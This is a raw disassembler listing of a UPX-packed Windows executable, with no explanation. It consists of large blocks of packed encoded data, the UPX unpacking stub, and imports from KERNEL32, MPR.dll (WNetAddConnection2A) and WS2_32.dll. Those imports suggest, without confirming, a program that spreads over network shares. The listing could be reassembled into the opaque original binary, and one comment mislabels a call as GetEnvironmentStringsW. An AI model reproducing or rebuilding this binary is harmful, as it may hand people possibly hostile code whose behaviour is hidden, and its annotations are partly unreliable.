100000h, 2700000h, 40000000h, 100000h, 20000h dd 400h, 0 dd 400h, 0 dd 0DE00000h, 100000h, 0 dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0 dd 1000h, 2 dup(0) dd 2818000h, 5000h, 1Ch dup(0) dd 65742E00h, 7478h, 25E8400h, 100000h, 2600000h, 40000h dd 3 dup(0) dd 2000h, 64722E60h, 617461h, 1CAE00h, 2700000h, 1E0000h dd 2640000h, 3 dup(0) dd 4000h, 61642E40h, 6174h, 0B400000h, 2900000h, 1480000h dd 2820000h, 3 dup(0) dd 4000h, 78732EC0h, 61746164h, 1800h, 0DD00000h, 20000h dd 3CA0000h, 3 dup(0) dd 24000h, 0DD000C0h, 2840800h, 0DD82900h, 0D7708000h dd 0E4A25453h, 50870A83h, 75B65444h, 96D36B02h, 0DADE0306h dd 171F9FEAh, 79E79EEEh, 5A063BDEh, 0D4B59778h, 79F34F3Eh dd 300111F3h, 9E016D4Eh, 67D379E7h, 7759063Ah, 4F79B496h dd 0D364AE79h, 62F4EF2h, 0A1EC794Dh, 0A0516CEAh, 0C8174002h dd 21F21F05h, 4008FA27h, 0C3500C9Ch, 0F20F900Fh, 12F42421h dd 16989680h, 7C8FE57Fh, 19BEBC20h, 1BC9BF04h, 0EDA1348Eh dd 0C21BCECCh, 0FFFFFFD3h, 20404EFFh, 70B59EF0h, 0C5ADA82Bh dd 0D040699Dh, 0E525FD5Dh, 194F8E1Ah, 714083EBh, 4395D796h dd 0FFFFED0Eh, 298D05FFh, 0F9409EAFh, 0ED44A0BFh, 818F1281h dd 0BF40B982h, 0CFA6D53Ch, 781F49FFh, 0F8094078h, 0C66FFFFFh dd 80E98CE0h, 93BA47C9h, 85BC41A8h, 3927556Bh, 0FF70F78Dh dd 0EFFFFh, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h dd 2F29F2CCh, 44268184h, 0FFFFFFFFh, 0AA171028h, 0E310AEF8h dd 44FAC4C5h, 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h dd 0A0AEA60Eh, 0FFFFFFFFh, 46A3E319h, 0C17650Dh, 75868175h dd 4D48C976h, 0A7E44258h, 353B3993h, 53EDB2B8h, 5DE5A74Dh dd 0FFFFFFFFh, 3B5DC53Dh, 5A929E8Bh, 0F0A65DFFh, 54C020A1h dd 61378CA5h, 5A8BFDD1h, 5D25D88Bh, 67DBF989h, 0FFFFFE32h dd 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch, 52028A20h dd 0BB25C460h, 0F776CCFFh, 102CCCDh, 3D713FFBh, 70A3D70Ah dd 0FF3FF809h, 5AFFFFFFh, 4FDF3B64h, 126E978Dh, 0C33FF583h dd 19652CD3h, 0B71758E2h, 0D03FF1D1h, 4784230Fh, 0FFAC471Bh dd 0C5FFFFFFh, 403FEEA7h, 6C69B6A6h, 37BD05AFh, 333FEB86h dd 7A42BC3Dh, 0BF94D5E5h, 0C23FE7D6h, 0FFCEFDFDh, 61FFFFFFh dd 0CC771184h, 2F3FE4ABh, 4DE15B4Ch, 9594BEC4h, 923FC9E6h dd 753B53C4h, 0BE14CD44h, 0FF3FAF9Ah, 0DEFFFFFFh, 3994BA67h dd 0B11EAD45h, 243F94CFh, 0BCE2C623h, 61313BBAh, 613F7A8Bh dd 7EC15955h, 0FF7C53B1h, 12FFFEDFh, 0D73F5FBBh, 68D2FEEh dd 158592BEh, 3F4644FBh, 0A539E9A5h, 0A87FEA27h, 0AC7D3F2Ah dd 0FFFFFFFFh, 64BCE4A1h, 0DDD0467Ch, 7B633E55h, 5423CC06h dd 91FF8377h, 0FA913D81h, 637A193Ah, 0C0314325h, 0FFFFFFFFh dd 89213CACh, 478238D1h, 0FD00B897h, 88DC3BD7h, 0B11B0858h dd 0A686E3E8h, 84C63B03h, 0B6074245h, 0FFFFFFFFh, 0DB377599h dd 71333A2Eh, 0DB23D21Ch, 9049EE32h, 87A6395Ah, 0DA57C0BEh dd 0A2A682A5h, 68E232B5h, 0FFFFFFFFh, 52A711B2h, 0B759449Fh dd 49252C10h, 34362DE4h, 0CEAE534Fh, 598F256Bh, 0DEC0A404h dd 0E8FB7DC2h, 0FFFFFFDBh, 0E79E1EC6h, 91575A88h, 8350BF3Ch dd 4B4E1822h, 83FD6265h, 9406AF8Fh, 0DE5A117Dh, 64E19Fh dd 0C8D2CEFFh, 0D8A6DD04h, 25FE0Ah, 41D9407Ch, 210EF56h dd 0CC400C73h, 0A08D0A2Fh, 5F635A5Fh, 60040FFh, 3A826E7Bh dd 2CE63F00h, 5F36D5E8h, 315F666Fh, 91B19841h, 81A17FD8h dd 0B62D489Eh, 5F8487h, 8232B7C0h, 63470C38h, 0F7751000h dd 46020A8Bh, 0A82A2CE9h, 4597F51h, 8B28150h, 116402A0h dd 22C80540h, 45900A80h, 8B201500h, 16402A00h, 2C815401h dd 5902A802h, 0B2055004h, 640AA008h, 0C8154011h, 902A8022h dd 20540045h, 40A8008Bh, 81500116h, 2A0022Ch, 5400459h dd 0A8008B2h, 15001164h, 2A0022C8h, 54014590h, 0A8028B20h dd 50041640h, 0A0082C81h, 40115902h, 8022B205h, 45640Ah dd 8BC815h, 116902Ah, 22C2054h, 45940A8h, 8B28150h, 116402A0h dd 22C80540h, 45900A80h, 8B201500h, 16402A00h, 2C815401h dd 5902A802h, 0B2055004h, 640AA008h, 0C8154011h, 902A8022h dd 20540045h, 40A8008Bh, 81500116h, 2A0022Ch, 5400459h dd 0A8008B2h, 15001164h, 2A0022C8h, 54014590h, 0A8028B20h dd 50041640h, 0A0082C81h, 40115902h, 8022B205h, 45640Ah dd 8BC815h, 116902Ah, 22D2054h, 0A87340A8h, 7401A82Ah dd 9944E200h, 260F8h, 84910801h, 61476507h, 0C80BB099h dd 80B81E41h, 3BABF180h, 61778956h, 31629E98h, 94968902h dd 0B61E7207h, 57BB44D8h, 4F64711Fh, 0F88B4566h, 491A8FE6h dd 64614273h, 766FCB7Ch, 1B3E5038h, 64616552h, 226E5552h dd 1145A63Eh, 0FBCC4564h, 6C2F5236h, 47386574h, 0C88B05F6h dd 1F57D2A5h, 2DC4CB0Bh, 127DCBCCh, 1DC73848h, 0BDEE7373h dd 64429DEDh, 3B5F9F48h, 0E265795Bh, 51356DBDh, 0DE0AD915h dd 0D53B1915h, 2DC15ACBh, 2F5773D8h, 5F65D8F2h, 0B6219811h dd 5BCB4131h, 4C4FC31Bh, 70614D43h, 186A1B95h, 48EF83FBh dd 7A691865h, 69615260h, 0A4776573h, 313FD84Ch, 434D454Fh dd 90B81250h, 0F347132h, 61571201h, 0E2015799h, 6B04BEDDh dd 84674137h, 576517C3h, 67B8482Bh, 48270DCAh, 7912F88Bh dd 422CCCC2h, 0CE3C7F21h, 807D847Fh, 0C41AA724h, 0C55B438Eh dd 4E978835h, 7187EFCAh, 5B0C4B7h, 7B5C4925h, 4F2218ACh dd 4797043h, 0AB1D2F89h, 0DAB07413h, 6529C782h, 0C4902733h dd 9D5B5825h, 61C49022h, 3653A32Eh, 2EC10DE4h, 684D499Fh dd 57116578h, 6369547Ch, 1454AB6Bh, 638B05BCh, 70D43D87h dd 4CA47DA0h, 76BC01E7h, 87618089h, 3C6F4C9Fh, 978388B0h dd 0B4938B15h, 99C70588h, 869122C1h, 146D615Ch, 0FC01D848h dd 89049D76h, 611F1E37h, 0C18BB0D9h, 0E7270C45h, 0A1220A4Ch dd 43CCA24Ch, 816D76E5h, 6E424D65h, 0CA362B98h, 49498E24h dd 0D0C30986h, 6A044161h, 5C1E0B17h, 89A715AFh, 576E0C54h dd 9CF5A020h, 0EB94D606h, 0D22DD1Ch, 0E92FD60Bh, 45A26C3Dh dd 0C7B5938Ch, 0E7362AB1h, 0DE69ABB5h, 0A94D88B0h, 0C19B9AB8h dd 266D282Eh, 1FBF440Dh, 0DC8EBE8Eh, 3FBD85D7h, 0EEEC72ECh dd 54712814h, 2B16F96Fh, 187B6D89h, 91731DB7h, 9894C638h dd 92B74683h, 431FAF30h, 24F88B6h, 9712437h, 2C75CA56h dd 1880C1ACh, 3C6E2901h, 0DAC3C54h, 0AB51674Ah, 0B2265350h dd 0A6A26FEBh, 0D9015C4Ch, 3571DAF8h, 0E6798FFFh, 7F0D4D52h dd 1353AD57h, 44CB6B3Ch, 8C045BB9h, 29C736E6h, 0E14B561Eh dd 0D9B1CF78h, 5A41899Eh, 4D70CAD5h, 96795062h, 0B338789h dd 20D1EDF8h, 1750431h, 0EB9EC37Bh, 6BBCF265h, 26174C1Bh dd 35B02BB1h, 65C07050h, 1D4D4777h, 23A5E050h, 0A970304Dh dd 8A9B5A38h, 0DA194723h, 80F8670h, 57EDE670h, 0DD6E6469h dd 6882142Fh, 420DA4F2h, 6D5E7479h, 158D985Bh, 6C283F2Ah dd 6D636873h, 8729C078h, 64816BD6h, 0E30DA747h, 6B65DCEBh dd 0D7F164F7h, 3F189960h, 21912073h, 0C133BD04h, 41C190F0h dd 7A236CBBh, 52BFBC3Ch, 92771474h, 89040D6Dh, 655A5A82h dd 0A4118967h, 95C99F61h, 0CD2204AAh, 0D7B2A0CBh, 56E60EE2h dd 0C889ED74h, 41DBC510h, 414B219h, 0C1BB19F9h, 0C3146396h dd 27591913h, 4B61395Ch, 0F02B4C9Fh, 50F17C52h, 0EC4114C9h dd 9A08100h, 0D86A0AB3h, 4B4F3E61h, 893ABD0Dh, 0D307FFE0h dd 4D34D34h, 73740C0Fh, 0F35C4C15h, 0D2E0A4Ch, 0DA697601h dd 0FF9DB4A3h, 409040Bh, 0A69A69A6h, 13170310h, 17FFFC12h dd 8106979Ah, 4550h, 4014Ch, 4718DA33h, 9FF3BC45h, 10F00E0h dd 606010Bh, 772F350Bh, 0D933E902h, 40027001h, 97B763B2h dd 67041417h, 370D7904h, 0CDF605B1h, 1019003Dh, 22A70D0Fh dd 804919F9h, 50000281h, 3056742Eh, 7865CFC1h, 21025E84h dd 36DA9960h, 2001DDF1h, 7722E2Ah, 7DF82EFBh, 1EF71CAEh dd 4F02640Eh, 2F69F340h, 4D2E047Bh, 904E0B12h, 0BEEC0148h dd 0C082491Fh, 5378732Eh, 0DD02118h, 33B1333Bh, 4F03CA49h dd 84083702h, 6F092492h, 0DD82910h, 2A000000h, 0FF49h dd 3 dup(0) ; --------------------------------------------------------------------------- public start start: pusha mov esi, offset dword_4C5000 lea edi, [esi-0C4000h] push edi or ebp, 0FFFFFFFFh jmp short loc_4DF262 ; --------------------------------------------------------------------------- align 8 loc_4DF258: ; CODE XREF: UPX1:loc_4DF269j mov al, [esi] inc esi mov [edi], al inc edi loc_4DF25E: ; CODE XREF: UPX1:004DF317j ; UPX1:004DF32Dj add ebx, ebx jnz short loc_4DF269 loc_4DF262: ; CODE XREF: UPX1:004DF250j mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF269: ; CODE XREF: UPX1:004DF260j jb short loc_4DF258 mov eax, 1 loc_4DF270: ; CODE XREF: UPX1:004DF29Aj add ebx, ebx jnz short loc_4DF27B mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF27B: ; CODE XREF: UPX1:004DF272j adc eax, eax add ebx, ebx jnb short loc_4DF28C jnz short loc_4DF2AB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jb short loc_4DF2AB loc_4DF28C: ; CODE XREF: UPX1:004DF27Fj dec eax add ebx, ebx jnz short loc_4DF298 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF298: ; CODE XREF: UPX1:004DF28Fj adc eax, eax jmp short loc_4DF270 ; --------------------------------------------------------------------------- loc_4DF29C: ; CODE XREF: UPX1:loc_4DF2CEj ; UPX1:loc_4DF2DCj add ebx, ebx jnz short loc_4DF2A7 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF2A7: ; CODE XREF: UPX1:004DF29Ej adc ecx, ecx jmp short loc_4DF2FD ; --------------------------------------------------------------------------- loc_4DF2AB: ; CODE XREF: UPX1:004DF281j ; UPX1:004DF28Aj xor ecx, ecx sub eax, 3 jb short loc_4DF2C3 shl eax, 8 mov al, [esi] inc esi xor eax, 0FFFFFFFFh jz short loc_4DF332 sar eax, 1 mov ebp, eax jmp short loc_4DF2CE ; --------------------------------------------------------------------------- loc_4DF2C3: ; CODE XREF: UPX1:004DF2B0j add ebx, ebx jnz short loc_4DF2CE mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF2CE: ; CODE XREF: UPX1:004DF2C1j ; UPX1:004DF2C5j jb short loc_4DF29C inc ecx add ebx, ebx jnz short loc_4DF2DC mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF2DC: ; CODE XREF: UPX1:004DF2D3j jb short loc_4DF29C loc_4DF2DE: ; CODE XREF: UPX1:004DF2EDj ; UPX1:004DF2F8j add ebx, ebx jnz short loc_4DF2E9 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_4DF2E9: ; CODE XREF: UPX1:004DF2E0j adc ecx, ecx add ebx, ebx jnb short loc_4DF2DE jnz short loc_4DF2FA mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_4DF2DE loc_4DF2FA: ; CODE XREF: UPX1:004DF2EFj add ecx, 2 loc_4DF2FD: ; CODE XREF: UPX1:004DF2A9j cmp ebp, 0FFFFFB00h adc ecx, 2 lea edx, [edi+ebp] cmp ebp, 0FFFFFFFCh jbe short loc_4DF31C loc_4DF30E: ; CODE XREF: UPX1:004DF315j mov al, [edx] inc edx mov [edi], al inc edi dec ecx jnz short loc_4DF30E jmp loc_4DF25E ; --------------------------------------------------------------------------- loc_4DF31C: ; CODE XREF: UPX1:004DF30Cj ; UPX1:004DF329j mov eax, [edx] add edx, 4 mov [edi], eax add edi, 4 sub ecx, 4 ja short loc_4DF31C add edi, ecx jmp loc_4DF25E ; --------------------------------------------------------------------------- loc_4DF332: ; CODE XREF: UPX1:004DF2BBj pop esi mov edi, esi mov ecx, 0FC2h loc_4DF33A: ; CODE XREF: UPX1:004DF341j ; UPX1:004DF346j mov al, [edi] inc edi sub al, 0E8h loc_4DF33F: ; CODE XREF: UPX1:004DF364j cmp al, 1 ja short loc_4DF33A cmp byte ptr [edi], 11h jnz short loc_4DF33A mov eax, [edi] mov bl, [edi+4] shr ax, 8 rol eax, 10h xchg al, ah sub eax, edi sub bl, 0E8h add eax, esi mov [edi], eax add edi, 5 mov al, bl loop loc_4DF33F lea edi, [esi+0DD000h] loc_4DF36C: ; CODE XREF: UPX1:004DF38Ej mov eax, [edi] or eax, eax jz short loc_4DF3B7 mov ebx, [edi+4] lea eax, [eax+esi+0DF000h] add ebx, esi push eax add edi, 8 call dword ptr [esi+0DF050h] xchg eax, ebp loc_4DF389: ; CODE XREF: UPX1:004DF3AFj mov al, [edi] inc edi or al, al jz short loc_4DF36C mov ecx, edi jns short near ptr loc_4DF39A+1 movzx eax, word ptr [edi] inc edi push eax inc edi loc_4DF39A: ; CODE XREF: UPX1:004DF392j mov ecx, 0AEF24857h push ebp call dword ptr [esi+0DF054h] or eax, eax jz short loc_4DF3B1 mov [ebx], eax add ebx, 4 jmp short loc_4DF389 ; --------------------------------------------------------------------------- loc_4DF3B1: ; CODE XREF: UPX1:004DF3A8j call dword ptr [esi+0DF05Ch] loc_4DF3B7: ; CODE XREF: UPX1:004DF370j mov ebp, [esi+0DF058h] lea edi, [esi-1000h] mov ebx, 1000h push eax push esp push 4 push ebx push edi call ebp ; GetEnvironmentStringsW lea eax, [edi+1FFh] and byte ptr [eax], 7Fh and byte ptr [eax+28h], 7Fh pop eax push eax push esp push eax push ebx push edi call ebp ; GetEnvironmentStringsW pop eax popa lea eax, [esp-80h] loc_4DF3EB: ; CODE XREF: UPX1:004DF3EFj push 0 cmp esp, eax jnz short loc_4DF3EB sub esp, 0FFFFFF80h jmp loc_41D933 ; --------------------------------------------------------------------------- align 1000h UPX1 ends ; Section 3. (virtual address 000E0000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00001000 ( 4096.) ; Offset to raw data for section: 000E0000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write UPX2 segment para public 'DATA' use32 assume cs:UPX2 ;org 4E0000h dd 3 dup(0) dd 0E0074h, 0E0050h, 3 dup(0) dd 0E0081h, 0E0064h, 3 dup(0) dd 0E0089h, 0E006Ch, 5 dup(0) dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0 aMQ db 'ˬq',0 align 4 dd 71AB157Eh, 0 aKernel32_dll_0 db 'KERNEL32.DLL',0 aMpr_dll_0 db 'MPR.dll',0 aWs2_32_dll_0 db 'WS2_32.dll',0 db 0 align 2 aLoadlibrarya db 'LoadLibraryA',0 align 4 aGetprocaddress db 'GetProcAddress',0 align 4 aVirtualprotect db 'VirtualProtect',0 align 4 aExitprocess db 'ExitProcess',0 db 0 align 2 aWnetaddconne_1 db 'WNetAddConnection2A',0 align 1000h UPX2 ends ; Section 4. (virtual address 000E1000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 000E1000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 4E1000h align 2000h _idata2 ends end start